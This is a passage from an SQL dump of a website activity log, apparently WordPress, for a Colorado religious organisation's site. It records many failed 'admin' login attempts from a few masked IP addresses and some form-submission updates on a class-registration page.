'),(229095,38632,'_message_key','user_unknown_login_failed'),(229096,38632,'_server_remote_addr','20.168.9.x'),(229097,38633,'failed_username','admin'),(229098,38633,'server_http_user_agent','Mozilla/5.0'),(229099,38633,'_message_key','user_unknown_login_failed'),(229100,38633,'_server_remote_addr','20.163.25.x'),(229101,38634,'failed_username','admin'),(229102,38634,'server_http_user_agent','Mozilla/5.0'),(229103,38634,'_message_key','user_unknown_login_failed'),(229104,38634,'_server_remote_addr','45.136.118.x'),(229105,38635,'failed_username','admin'),(229106,38635,'server_http_user_agent','Mozilla/5.0'),(229107,38635,'_message_key','user_unknown_login_failed'),(229108,38635,'_server_remote_addr','20.169.51.x'),(229109,38636,'failed_username','admin'),(229110,38636,'server_http_user_agent','Mozilla/5.0'),(229111,38636,'_message_key','user_unknown_login_failed'),(229112,38636,'_server_remote_addr','20.163.25.x'),(229113,38637,'failed_username','admin'),(229114,38637,'server_http_user_agent','Mozilla/5.0'),(229115,38637,'_message_key','user_unknown_login_failed'),(229116,38637,'_server_remote_addr','45.136.118.x'),(229117,38638,'failed_username','admin'),(229118,38638,'server_http_user_agent','Mozilla/5.0'),(229119,38638,'_message_key','user_unknown_login_failed'),(229120,38638,'_server_remote_addr','20.168.9.x'),(229121,38639,'failed_username','admin'),(229122,38639,'server_http_user_agent','Mozilla/5.0'),(229123,38639,'_message_key','user_unknown_login_failed'),(229124,38639,'_server_remote_addr','20.163.25.x'),(229125,38640,'failed_username','admin'),(229126,38640,'server_http_user_agent','Mozilla/5.0'),(229127,38640,'_message_key','user_unknown_login_failed'),(229128,38640,'_server_remote_addr','20.169.51.x'),(229129,38641,'failed_username','admin'),(229130,38641,'server_http_user_agent','Mozilla/5.0'),(229131,38641,'_message_key','user_unknown_login_failed'),(229132,38641,'_server_remote_addr','45.136.118.x'),(229133,38642,'failed_username','admin'),(229134,38642,'server_http_user_agent','Mozilla/5.0'),(229135,38642,'_message_key','user_unknown_login_failed'),(229136,38642,'_server_remote_addr','20.163.25.x'),(229137,38643,'failed_username','admin'),(229138,38643,'server_http_user_agent','Mozilla/5.0'),(229139,38643,'_message_key','user_unknown_login_failed'),(229140,38643,'_server_remote_addr','45.136.118.x'),(229141,38644,'failed_username','admin'),(229142,38644,'server_http_user_agent','Mozilla/5.0'),(229143,38644,'_message_key','user_unknown_login_failed'),(229144,38644,'_server_remote_addr','20.169.51.x'),(229145,38645,'failed_username','admin'),(229146,38645,'server_http_user_agent','Mozilla/5.0'),(229147,38645,'_message_key','user_unknown_login_failed'),(229148,38645,'_server_remote_addr','20.168.9.x'),(229149,38646,'failed_username','admin'),(229150,38646,'server_http_user_agent','Mozilla/5.0'),(229151,38646,'_message_key','user_unknown_login_failed'),(229152,38646,'_server_remote_addr','20.163.25.x'),(229153,38647,'failed_username','admin'),(229154,38647,'server_http_user_agent','Mozilla/5.0'),(229155,38647,'_message_key','user_unknown_login_failed'),(229156,38647,'_server_remote_addr','45.136.118.x'),(229157,38648,'failed_username','admin'),(229158,38648,'server_http_user_agent','Mozilla/5.0'),(229159,38648,'_message_key','user_unknown_login_failed'),(229160,38648,'_server_remote_addr','20.163.25.x'),(229161,38649,'failed_username','admin'),(229162,38649,'server_http_user_agent','Mozilla/5.0'),(229163,38649,'_message_key','user_unknown_login_failed'),(229164,38649,'_server_remote_addr','20.169.51.x'),(229165,38650,'failed_username','admin'),(229166,38650,'server_http_user_agent','Mozilla/5.0'),(229167,38650,'_message_key','user_unknown_login_failed'),(229168,38650,'_server_remote_addr','45.136.118.x'),(229169,38651,'failed_username','admin'),(229170,38651,'server_http_user_agent','Mozilla/5.0'),(229171,38651,'_message_key','user_unknown_login_failed'),(229172,38651,'_server_remote_addr','20.163.25.x'),(229173,38652,'failed_username','admin'),(229174,38652,'server_http_user_agent','Mozilla/5.0'),(229175,38652,'_message_key','user_unknown_login_failed'),(229176,38652,'_server_remote_addr','20.168.9.x'),(229177,38653,'failed_username','admin'),(229178,38653,'server_http_user_agent','Mozilla/5.0'),(229179,38653,'_message_key','user_unknown_login_failed'),(229180,38653,'_server_remote_addr','45.136.118.x'),(229181,38654,'failed_username','admin'),(229182,38654,'server_http_user_agent','Mozilla/5.0'),(229183,38654,'_message_key','user_unknown_login_failed'),(229184,38654,'_server_remote_addr','20.169.51.x'),(229185,38655,'failed_username','admin'),(229186,38655,'server_http_user_agent','Mozilla/5.0'),(229187,38655,'_message_key','user_unknown_login_failed'),(229188,38655,'_server_remote_addr','20.163.25.x'),(229189,38656,'post_id','269216'),(229190,38656,'post_type','nf_sub'),(229191,38656,'post_title',''),(229192,38656,'_message_key','post_updated'),(229193,38656,'_server_remote_addr','75.71.62.x'),(229194,38656,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/?utm_source=BenchmarkEmail&utm_campaign=ETC_October_2023_News&utm_medium=email'),(229195,38657,'failed_username','admin'),(229196,38657,'server_http_user_agent','Mozilla/5.0'),(229197,38657,'_message_key','user_unknown_login_failed'),(229198,38657,'_server_remote_addr','45.136.118.x'),(229199,38658,'failed_username','admin'),(229200,38658,'server_http_user_agent','Mozilla/5.0'),(229201,38658,'_message_key','user_unknown_login_failed'),(229202,38658,'_server_remote_addr','20.163.25.x'),(229203,38659,'failed_username','admin'),(229204,38659,'server_http_user_agent','Mozilla/5.0'),(229205,38659,'_message_key','user_unknown_login_failed'),(229206,38659,'_server_remote_addr','20.168.9.x'),(229207,38660,'failed_username','admin'),(229208,38660,'server_http_user_agent','Mozilla/5.0'),(229209,38660,'_message_key','user_unknown_login_failed'),(229210,38660,'_server_remote_addr','20.169.51.x'),(229211,38661,'failed_username','admin'),(229212,38661,'server_http_user_agent','Mozilla/5.0'),(229213,38661,'_message_key','user_unknown_login_failed'),(229214,38661,'_server_remote_addr','20.163.25.x'),(229215,38662,'failed_username','admin'),(229216,38662,'server_http_user_agent','Mozilla/5.0'),(229217,38662,'_message_key','user_unknown_login_failed'),(229218,38662,'_server_remote_addr','45.136.118.x'),(229219,38663,'failed_username','admin'),(229220,38663,'server_http_user_agent','Mozilla/5.0'),(229221,38663,'_message_key','user_unknown_login_failed'),(229222,38663,'_server_remote_addr','20.163.25.x'),(229223,38664,'failed_username','admin'),(229224,38664,'server_http_user_agent','Mozilla/5.0'),(229225,38664,'_message_key','user_unknown_login_failed'),(229226,38664,'_server_remote_addr','45.136.118.x'),(229227,38665,'failed_username','admin'),(229228,38665,'server_http_user_agent','Mozilla/5.0'),(229229,38665,'_message_key','user_unknown_login_failed'),(229230,38665,'_server_remote_addr','20.169.51.x'),(229231,38666,'failed_username','admin'),(229232,38666,'server_http_user_agent','Mozilla/5.0'),(229233,38666,'_message_key','user_unknown_login_failed'),(229234,38666,'_server_remote_addr','20.168.9.x'),(229235,38667,'failed_username','admin'),(229236,38667,'server_http_user_agent','Mozilla/5.0'),(229237,38667,'_message_key','user_unknown_login_failed'),(229238,38667,'_server_remote_addr','20.163.25.x'),(229239,38668,'failed_username','admin'),(229240,38668,'server_http_user_agent','Mozilla/5.0'),(229241,38668,'_message_key','user_unknown_login_failed'),(229242,38668,'_server_remote_addr','45.136.118.x'),(229243,38669,'failed_username','admin'),(229244,38669,'server_http_user_agent','Mozilla/5.0'),(229245,38669,'_message_key','user_unknown_login_failed'),(229246,38669,'_server_remote_addr','20.169.51.x'),(229247,38670,'failed_username','admin'),(229248,38670,'server_http_user_agent','Mozilla/5.0'),(229249,38670,'_message_key','user_unknown_login_failed'),(229250,38670,'_server_remote_addr','20.163.25.x'),(229251,38671,'failed_username','admin'),(229252,38671,'server_http_user_agent','Mozilla/5.0'),(229253,38671,'_message_key','user_unknown_login_failed'),(229254,38671,'_server_remote_addr','45.136.118.x'),(229255,38672,'failed_username','admin'),(229256,38672,'server_http_user_agent','Mozilla/5.0'),(229257,38672,'_message_key','user_unknown_login_failed'),(229258,38672,'_server_remote_addr','20.168.9.x'),(229259,38673,'failed_username','admin'),(229260,38673,'server_http_user_agent','Mozilla/5.0'),(229261,38673,'_message_key','user_unknown_login_failed'),(229262,38673,'_server_remote_addr','20.163.25.x'),(229263,38674,'failed_username','admin'),(229264,38674,'server_http_user_agent','Mozilla/5.0'),(229265,38674,'_message_key','user_unknown_login_failed'),(229266,38674,'_server_remote_addr','20.169.51.x'),(229267,38675,'failed_username','admin'),(229268,38675,'server_http_user_agent','Mozilla/5.0'),(229269,38675,'_message_key','user_unknown_login_failed'),(229270,38675,'_server_remote_addr','45.136.118.x'),(229271,38676,'failed_username','admin'),(229272,38676,'server_http_user_agent','Mozilla/5.0'),(229273,38676,'_message_key','user_unknown_login_failed'),(229274,38676,'_server_remote_addr','20.163.25.x'),(229275,38677,'failed_username','admin'),(229276,38677,'server_http_user_agent','Mozilla/5.0'),(229277,38677,'_message_key','user_unknown_login_failed'),(229278,38677,'_server_remote_addr','45.136.118.x'),(229279,38678,'failed_username','admin'),(229280,38678,'server_http_user_agent','Mozilla/5.0'),(229281,38678,'_message_key','user_unknown_login_failed'),(229282,38678,'_server_remote_addr','20.163.25.x'),(229283,38679,'failed_username','admin'),(229284,38679,'server_http_user_agent','Mozilla/5.0'),(229285,38679,'_message_key','user_unknown_login_failed'),(229286,38679,'_server_remote_addr','20.169.51.x'),(229287,38680,'failed_username','admin'),(229288,38680,'server_http_user_agent','Mozilla/5.0'),(229289,38680,'_message_key','user_unknown_login_failed'),(229290,38680,'_server_remote_addr','20.168.9.x'),(229291,38681,'failed_username','admin'),(229292,38681,'server_http_user_agent','Mozilla/5.0'),(229293,38681,'_message_key','user_unknown_login_failed'),(229294,38681,'_server_remote_addr','45.136.118.x'),(229295,38682,'failed_username','admin'),(229296,38682,'server_http_user_agent','Mozilla/5.0'),(229297,38682,'_message_key','user_unknown_login_failed'),(229298,38682,'_server_remote_addr','20.163.25.x'),(229299,38683,'post_id','269217'),(229300,38683,'post_type','nf_sub'),(229301,38683,'post_title',''),(229302,38683,'_message_key','post_updated'),(229303,38683,'_server_remote_addr','172.59.229.x'),(229304,38683,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(229305,38684,'post_id','269218'),(229306,38684,'post_type','nf_sub'),(229307,38684,'post_title',''),(229308,38684,'_message_key','post_updated'),(229309,38684,'_server_remote_addr','172.59.229.x'),(229310,38684,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(229311,38685,'failed_username','admin'),(229312,38685,'server_http_user_agent','Mozilla/5.0'),(229313,38685,'_message_key','user_unknown_login_failed'),(229314,38685,'_server_remote_addr','20.169.51.x'),(229315,38686,'failed_username','admin'),(229316,38686,'server_http_user_agent','Mozilla/5.0'),(229317,38686,'_message_key','user_unknown_login_failed'),(229318,38686,'_server_remote_addr','45.136.118.x'),(229319,38687,'failed_username','admin'),(229320,38687,'server_http_user_agent','Mozilla/5.0'),(229321,38687,'_message_key','user_unknown_login_failed'),(229322,38687,'_server_remote_addr','20.163.25.x'),(229323,38688,'failed_username','admin'),(229324,38688,'server_http_user_agent','Mozilla/5.0'),(229325,38688,'_message_key','user_unknown_login_failed'),(229326,38688,'_server_remote_addr','20.168.9.x'),(229327,38689,'failed_username','admin'),(229328,38689,'server_http_user_agent','Mozilla/5.0'),(229329,38689,'_message_key','user_unknown_login_failed'),(229330,38689,'_server_remote_addr','45.136.118.x'),(229331,38690,'failed_username','admin'),(229332,38690,'server_http_user_agent','Mozilla/5.0'),(229333,38690,'_message_key','user_unknown_login_failed'),(229334,38690,'_server_remote_addr','20.163.25.x'),(229335,38691,'failed_username','admin'),(229336,38691,'server_http_user_agent','Mozilla/5.0'),(229337,38691,'_message_key','user_unknown_login_failed'),(229338,38691,'_server_remote_addr','20.169.51.x'),(229339,38692,'failed_username','admin'),(229340,38692,'server_http_user_agent','Mozilla/5.0'),(229341,38692,'_message_key','user_unknown_login_failed'),(229342,38692,'_server_remote_addr','45.136.118.x'),(229343,38693,'failed_username','admin'),(229344,38693,'server_http_user_agent','Mozilla/5.0'),(229345,38693,'_message_key','user_unknown_login_failed'),(229346,38693,'_server_remote_addr','20.169.51.x'),(229347,38694,'failed_username','admin'),(229348,38694,'server_http_user_agent','Mozilla/5.0'),(229349,38694,'_message_key','user_unknown_login_failed'),(229350,38694,'_server_remote_addr','20.168.9.x'),(229351,38695,'failed_username','admin'),(229352,38695,'server_http_user_agent','Mozilla/5.0'),(229353,38695,'_message_key','user_unknown_login_failed'),(229354,38695,'_server_remote_addr','45.136.118.x'),(229355,38696,'failed_username','admin'),(229356,38696,'server_http_user_agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),(229357,38696,'_message_key','user_unknown_login_failed'),(229358,38696,'_server_remote_addr','34.65.234.x'),(229359,38697,'failed_username','admin'),(229360,38697,'server_http_user_agent','Mozilla/5.0'),(229361,38697,'_message_key','user_unknown_login_failed'),(229362,38697,'_server_remote_addr','45.136.118.x'),(229363,38698,'failed_username','admin'),(229364,38698,'server_http_user_agent','Mozilla/5.0'),(229365,38698,'_message_key','user_unknown_login_failed'),(229366,38698,'_server_remote_addr','20.169.51.x'),(229367,38699,'failed_username','admin'),(229368,38699,'server_http_user_agent','Mozilla/5.0'),(229369,38699,'_message_key','user_unknown_login_failed'),(229370,38699,'_server_remote_addr','45.136.118.x'),(229371,38700,'failed_username','admin'),(229372,38700,'server_http_user_agent','Mozilla/5.0'),(229373,38700,'_message_key','user_unknown_login_failed'),(229374,38700,'_server_remote_addr','20.168.9.x'),(229375,38701,'failed_username','admin'),(229376,38701,'server_http_user_agent','Mozilla/5.0'),(229377,38701,'_message_key','user_unknown_login_failed'),(229378,38701,'_server_remote_addr','20.169.51.x'),(229379,38702,'failed_username','admin'),(229380,38702,'server_http_user_agent','Mozilla/5.0'),(229381,38702,'_message_key','user_unknown_login_failed'),(229382,38702,'_server_remote_addr','45.136.118.x'),(229383,38703,'failed_username','admin'),(229384,38703,'server_http_user_agent','Mozilla/5.0'),(229385,38703,'_message_key','user_unknown_login_failed'),(229386,38703,'_server_remote_addr','45.136.118.x'),(229387,38704,'failed_username','admin'),(229388,38704,'server_http_user_agent','Mozilla/5.0'),(229389,38704,'_message_key','user_unknown_login_failed'),(229390,38704,'_server_remote_addr','20.168.9.x'),(229391,38705,'failed_username','admin'),(229392,38705,'server_http_user_agent','Mozilla/5.0'),(229393,38705,'_message_key','user_unknown_login_failed'),(229394,38705,'_server_remote_addr','20.169.51.x'),(229395,38706,'failed_username','admin'),(229396,38706,'server_http_user_agent','Mozilla/5.0'),(229397,38706,'_message_key','user_unknown_login_failed'),(229398,38706,'_server_remote_addr','45.136.118.x'),(229399,38707,'failed_username','admin'),(229400,38707,'server_http_user_agent','Mozilla/5.0'),(229401,38707,'_message_key','user_unknown_login_failed'),(229402,38707,'_server_remote_addr','20.169.51.x'),(229403,38708,'failed_username','admin'),(229404,38708,'server_http_user_agent','Mozilla/5.0'),(229405,38708,'_message_key','user_unknown_login_failed'),(229406,38708,'_server_remote_addr','45.136.118.x'),(229407,38709,'failed_username','admin'),(229408,38709,'server_http_user_agent','Mozilla/5.0'),(229409,38709,'_message_key','user_unknown_login_failed'),(229410,38709,'_server_remote_addr','20.168.9.x'),(229411,38710,'failed_username','admin'),(229412,38710,'server_http_user_agent','Mozilla/5.0'),(229413,38710,'_message_key','user_unknown_login_failed'),(229414,38710,'_server_remote_addr','45.136.118.x'),(229415,38711,'failed_username','admin'),(229416,38711,'server_http_user_agent','Mozilla/5.0'),(229417,38711,'_message_key','user_unknown_login_failed'),(229418,38711,'_server_remote_addr','45.136.118.x'),(229419,38712,'failed_username','admin'),(229420,38712,'server_http_user_agent','Mozilla/5.0'),(229421,38712,'_message_key','user_unknown_login_failed'),(229422,38712,'_server_remote_addr','20.168.9.x'),(229423,38713,'failed_username','admin'),(229424,38713,'server_http_user_agent','Mozilla/5.0'),(229425,38713,'_message_key','user_unknown_login_failed'),(229426,38713,'_server_remote_addr','45.136.118.x'),(229427,38714,'failed_username','smngrs951'),(229428,38714,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),(229429,38714,'_message_key','user_unknown_login_failed'),(229430,38714,'_server_remote_addr','198.98.51.x'),(229431,38715,'failed_username','admin'),(229432,38715,'server_http_user_agent','Mozilla/5.0'),(229433,38715,'_message_key','user_unknown_login_failed'),(229434,38715,'_server_remote_addr','45.136.118.x'),(229435,38716,'failed_username','admin'),(229436,38716,'server_http_user_agent','Mozilla/5.0'),(229437,38716,'_message_key','user_unknown_login_failed'),(229438,38716,'_server_remote_addr','20.168.9.x'),(229439,38717,'failed_username','admin'),(229440,38717,'server_http_user_agent','Mozilla/5.0'),(229441,38717,'_message_key','user_unknown_login_failed'),(229442,38717,'_server_remote_addr','45.136.118.x'),(229443,38718,'failed_username','admin'),(229444,38718,'server_http_user_agent','Mozilla/5.0'),(229445,38718,'_message_key','user_unknown_login_failed'),(229446,38718,'_server_remote_addr','45.136.118.x'),(229447,38719,'failed_username','admin'),(229448,38719,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(229449,38719,'_message_key','user_unknown_login_failed'),(229450,38719,'_server_remote_addr','146.190.217.x'),(229451,38720,'failed_username','admin'),(229452,38720,'server_http_user_agent','Mozilla/5.0'),(229453,38720,'_message_key','user_unknown_login_failed'),(229454,38720,'_server_remote_addr','45.136.118.x'),(229455,38721,'failed_username','admin'),(229456,38721,'server_http_user_agent','Mozilla/5.0'),(229457,38721,'_message_key','user_unknown_login_failed'),(229458,38721,'_server_remote_addr','45.136.118.x'),(229459,38722,'failed_username','admin'),(229460,38722,'server_http_user_agent','Mozilla/5.0'),(229461,38722,'_message_key','user_unknown_login_failed'),(229462,38722,'_server_remote_addr','45.136.118.x'),(229463,38723,'failed_username','admin'),(229464,38723,'server_http_user_agent','Mozilla/5.0'),(229465,38723,'_message_key','user_unknown_login_failed'),(229466,38723,'_server_remote_addr','45.136.118.x'),(229467,38724,'failed_username','admin'),(229468,38724,'server_http_user_agent','Mozilla/5.0'),(229469,38724,'_message_key','user_unknown_login_failed'),(229470,38724,'_server_remote_addr','45.136.118.x'),(229471,38725,'failed_username','admin'),(229472,38725,'server_http_user_agent','Mozilla/5.0'),(229473,38725,'_message_key','user_unknown_login_failed'),(229474,38725,'_server_remote_addr','45.136.118.x'),(229475,38726,'failed_username','admin'),(229476,38726,'server_http_user_agent','Mozilla/5.0'),(229477,38726,'_message_key','user_unknown_login_failed'),(229478,38726,'_server_remote_addr','20.150.198.x'),(229479,38727,'failed_username','admin'),(229480,38727,'server_http_user_agent','Mozilla/5.0'),(229481,38727,'_message_key','user_unknown_login_failed'),(229482,38727,'_server_remote_addr','45.136.118.x'),(229483,38728,'failed_username','admin'),(229484,38728,'server_http_user_agent','Mozilla/5.0'),(229485,38728,'_message_key','user_unknown_login_failed'),(229486,38728,'_server_remote_addr','45.136.118.x'),(229487,38729,'failed_username','admin'),(229488,38729,'server_http_user_agent','Mozilla/5.0'),(229489,38729,'_message_key','user_unknown_login_failed'),(229490,38729,'_server_remote_addr','20.150.198.x'),(229491,38730,'failed_username','admin'),(229492,38730,'server_http_user_agent','Mozilla/5.0'),(229493,38730,'_message_key','user_unknown_login_failed'),(229494,38730,'_server_remote_addr','20.150.198.x'),(229495,38731,'failed_username','admin'),(229496,38731,'server_http_user_agent','Mozilla/5.0'),(229497,38731,'_message_key','user_unknown_login_failed'),(229498,38731,'_server_remote_addr','45.136.118.x'),(229499,38732,'failed_username','admin'),(229500,38732,'server_http_user_agent','Mozilla/5.0'),(229501,38732,'_message_key','user_unknown_login_failed'),(229502,38732,'_server_remote_addr','20.150.198.x'),(229503,38733,'failed_username','admin'),(229504,38733,'server_http_user_agent','Mozilla/5.0'),(229505,38733,'_message_key','user_unknown_login_failed'),(229506,38733,'_server_remote_addr','45.136.118.x'),(229507,38734,'failed_username','admin'),(229508,38734,'server_http_user_agent','Mozilla/5.0'),(229509,38734,'_message_key','user_unknown_login_failed'),(229510,38734,'_server_remote_addr','20.150.198.x'),(229511,38735,'failed_username','admin'),(229512,38735,'server_http_user_agent','Mozilla/5.0'),(229513,38735,'_message_key','user_unknown_login_failed'),(229514,38735,'_server_remote_addr','45.136.118.x'),(229515,38736,'failed_username','admin'),(229516,38736,'server_http_user_agent','Mozilla/5.0'),(229517,38736,'_message_key','user_unknown_login_failed'),(229518,38736,'_server_remote_addr','20.150.198.x'),(229519,38737,'failed_username','admin'),(229520,38737,'server_http_user_agent','Mozilla/5.0'),(229521,38737,'_message_key','user_unknown_login_failed'),(229522,38737,'_server_remote_addr','45.136.118.x'),(229523,38738,'failed_username','admin'),(229524,38738,'server_http_user_agent','Mozilla/5.0'),(229525,38738,'_message_key','user_unknown_login_failed'),(229526,38738,'_server_remote_addr','20.150.198.x'),(229527,38739,'failed_username','admin'),(229528,38739,'server_http_user_agent','Mozilla/5.0'),(229529,38739,'_message_key','user_unknown_login_failed'),(229530,38739,'_server_remote_addr','45.136.118.x'),(229531,38740,'failed_username','admin'),(229532,38740,'server_http_user_agent','Mozilla/5.0'),(229533,38740,'_message_key','user_unknown_login_failed'),(229534,38740,'_server_remote_addr','20.150.198.x'),(229535,38741,'failed_username','admin'),(229536,38741,'server_http_user_agent','Mozilla/5.0'),(229537,38741,'_message_key','user_unknown_login_failed'),(229538,38741,'_server_remote_addr','45.136.118.x'),(229539,38742,'failed_username','admin'),(229540,38742,'server_http_user_agent','Mozilla/5.0'),(229541,38742,'_message_key','user_unknown_login_failed'),(229542,38742,'_server_remote_addr','20.150.198.x'),(229543,38743,'failed_username','admin'),(229544,38743,'server_http_user_agent','Mozilla/5.0'),(229545,38743,'_message_key','user_unknown_login_failed'),(229546,38743,'_server_remote_addr','45.136.118.x'),(229547,38744,'failed_username','admin'),(229548,38744,'server_http_user_agent','Mozilla/5.0'),(229549,38744,'_message_key','user_unknown_login_failed'),(229550,38744,'_server_remote_addr','20.150.198.x'),(229551,38745,'failed_username','admin'),(229552,38745,'server_http_user_agent','Mozilla/5.0'),(229553,38745,'_message_key','user_unknown_login_failed'),(229554,38745,'_server_remote_addr','45.136.118.x'),(229555,38746,'failed_username','admin'),(229556,38746,'server_http_user_agent','Mozilla/5.0'),(229557,38746,'_message_key','user_unknown_login_failed'),(229558,38746,'_server_remote_addr','20.150.198.x'),(229559,38747,'failed_username','admin'),(229560,38747,'server_http_user_agent','Mozilla/5.0'),(229561,38747,'_message_key','user_unknown_login_failed'),(229562,38747,'_server_remote_addr','45.136.118.x'),(229563,38748,'failed_username','admin'),(229564,38748,'server_http_user_agent','Mozilla/5.0'),(229565,38748,'_message_key','user_unknown_login_failed'),(229566,38748,'_server_remote_addr','20.150.198.x'),(229567,38749,'failed_username','admin'),(229568,38749,'server_http_user_agent','Mozilla/5.0'),(229569,38749,'_message_key','user_unknown_login_failed'),(229570,38749,'_server_remote_addr','45.136.118.x'),(229571,38750,'failed_username','admin'),(229572,38750,'server_http_user_agent','Mozilla/5.0'),(229573,38750,'_message_key','user_unknown_login_failed'),(229574,38750,'_server_remote_addr','20.150.198.x'),(229575,38751,'failed_username','admin'),(229576,38751,'server_http_user_agent','Mozilla/5.0'),(229577,38751,'_message_key','user_unknown_login_failed'),(229578,38751,'_server_remote_addr','45.136.118.x'),(229579,38752,'failed_username','admin'),(229580,38752,'server_http_user_agent','Mozilla/5.0'),(229581,38752,'_message_key','user_unknown_login_failed'),(229582,38752,'_server_remote_addr','20.150.198.x'),(229583,38753,'failed_username','admin'),(229584,38753,'server_http_user_agent','Mozilla/5.0'),(229585,38753,'_message_key','user_unknown_login_failed'),(229586,38753,'_server_remote_addr','45.136.118.x'),(229587,38754,'failed_username','admin'),(229588,38754,'server_http_user_agent','Mozilla/5.0'),(229589,38754,'_message_key','user_unknown_login_failed'),(229590,38754,'_server_remote_addr','20.150.198.x'),(229591,38755,'failed_username','admin'),(229592,38755,'server_http_user_agent','Mozilla/5.0'),(229593,38755,'_message_key','user_unknown_login_failed'),(229594,38755,'_server_remote_addr','45.136.118.x'),(229595,38756,'failed_username','admin'),(229596,38756,'server_http_user_agent','Mozilla/5.0'),(229597,38756,'_message_key','user_unknown_login_failed'),(229598,38756,'_server_remote_addr','20.150.198.x'),(229599,38757,'failed_username','admin'),(229600,38757,'server_http_user_agent','Mozilla/5.0'),(229601,38757,'_message_key','user_unknown_login_failed'),(229602,38757,'_server_remote_addr','45.136.118.x'),(229603,38758,'failed_username','admin'),(229604,38758,'server_http_user_agent','Mozilla/5.0'),(229605,38758,'_message_key','user_unknown_login_failed'),(229606,38758,'_server_remote_addr','20.150.198.x'),(229607,38759,'failed_username','admin'),(229608,38759,'server_http_user_agent','Mozilla/5.0'),(229609,38759,'_message_key','user_unknown_login_failed'),(229610,38759,'_server_remote_addr','45.136.118.x'),(229611,38760,'post_id','269219'),(229612,38760,'post_type','nf_sub'),(229613,38760,'post_title',''),(229614,38760,'_message_key','post_updated'),(229615,38760,'_server_remote_addr','75.166.44.x'),(229616,38760,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(229617,38761,'failed_username','admin'),(229618,38761,'server_http_user_agent','Mozilla/5.0'),(229619,38761,'_message_key','user_unknown_login_failed'),(229620,38761,'_server_remote_addr','20.150.198.x'),(229621,38762,'failed_username','admin'),(229622,38762,'server_http_user_agent','Mozilla/5.0'),(229623,38762,'_message_key','user_unknown_login_failed'),(229624,38762,'_server_remote_addr','45.136.118.x'),(229625,38763,'failed_username','admin'),(229626,38763,'server_http_user_agent','Mozilla/5.0'),(229627,38763,'_message_key','user_unknown_login_failed'),(229628,38763,'_server_remote_addr','20.150.198.x'),(229629,38764,'failed_username','admin'),(229630,38764,'server_http_user_agent','Mozilla/5.0'),(229631,38764,'_message_key','user_unknown_login_failed'),(229632,38764,'_server_remote_addr','45.136.118.x'),(229633,38765,'failed_username','admin'),(229634,38765,'server_http_user_agent','Mozilla/5.0'),(229635,38765,'_message_key','user_unknown_login_failed'),(229636,38765,'_server_remote_addr','20.150.198.x'),(229637,38766,'failed_username','admin'),(229638,38766,'server_http_user_agent','Mozilla/5.0'),(229639,38766,'_message_key','user_unknown_login_failed'),(229640,38766,'_server_remote_addr','45.136.118.x'),(229641,38767,'failed_username','admin'),(229642,38767,'server_http_user_agent','Mozilla/5.0'),(229643,38767,'_message_key','user_unknown_login_failed'),(229644,38767,'_server_remote_addr','20.150.198.x'),(229645,38768,'failed_username','admin'),(229646,38768,'server_http_user_agent','Mozilla/5.0'),(229647,38768,'_message_key','user_unknown_login_failed'),(229648,38768,'_server_remote_addr','45.136.118.x'),(229649,38769,'failed_username','admin'),(229650,38769,'server_http_user_agent','Mozilla/5.0'),(229651,38769,'_message_key','user_unknown_login_failed'),(229652,38769,'_server_remote_addr','20.150.198.x'),(229653,38770,'failed_username','admin'),(229654,38770,'server_http_user_agent','Mozilla/5.0'),(229655,38770,'_message_key','user_unknown_login_failed'),(229656,38770,'_server_remote_addr','45.136.118.x'),(229657,38771,'failed_username','admin'),(229658,38771,'server_http_user_agent','Mozilla/5.0'),(229659,38771,'_message_key','user_unknown_login_failed'),(229660,38771,'_server_remote_addr','20.150.198.x'),(229661,38772,'failed_username','admin'),(229662,38772,'server_http_user_agent','Mozilla/5.0'),(229663,38772,'_message_key','user_unknown_login_failed'),(229664,38772,'_server_remote_addr','45.136.118.x'),(229665,38773,'failed_username','admin'),(229666,38773,'server_http_user_agent','Mozilla/5.0'),(229667,38773,'_message_key','user_unknown_login_failed'),(229668,38773,'_server_remote_addr','20.150.198.x'),(229669,38774,'failed_username','admin'),(229670,38774,'server_http_user_agent','Mozilla/5.0'),(229671,38774,'_message_key','user_unknown_login_failed'),(229672,38774,'_server_remote_addr','45.136.118.x'),(229673,38775,'failed_username','admin'),(229674,38775,'server_http_user_agent','Mozilla/5.0'),(229675,38775,'_message_key','user_unknown_login_failed'),(229676,38775,'_server_remote_addr','20.150.198.x'),(229677,38776,'failed_username','admin'),(229678,38776,'server_http_user_agent','Mozilla/5.0'),(229679,38776,'_message_key','user_unknown_login_failed'),(229680,38776,'_server_remote_addr','45.136.118.x'),(229681,38777,'failed_username','admin'),(229682,38777,'server_http_user_agent','Mozilla/5.0'),(229683,38777,'_message_key','user_unknown_login_failed'),(229684,38777,'_server_remote_addr','20.150.198.x'),(229685,38778,'failed_username','admin'),(229686,38778,'server_http_user_agent','Mozilla/5.0'),(229687,38778,'_message_key','user_unknown_login_failed'),(229688,38778,'_server_remote_addr','20.150.198.x'),(229689,38779,'failed_username','admin'),(229690,38779,'server_http_user_agent','Mozilla/5.0'),(229691,38779,'_message_key','user_unknown_login_failed'),(229692,38779,'_server_remote_addr','45.136.118.x'),(229693,38780,'failed_username','wadminw'),(229694,38780,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 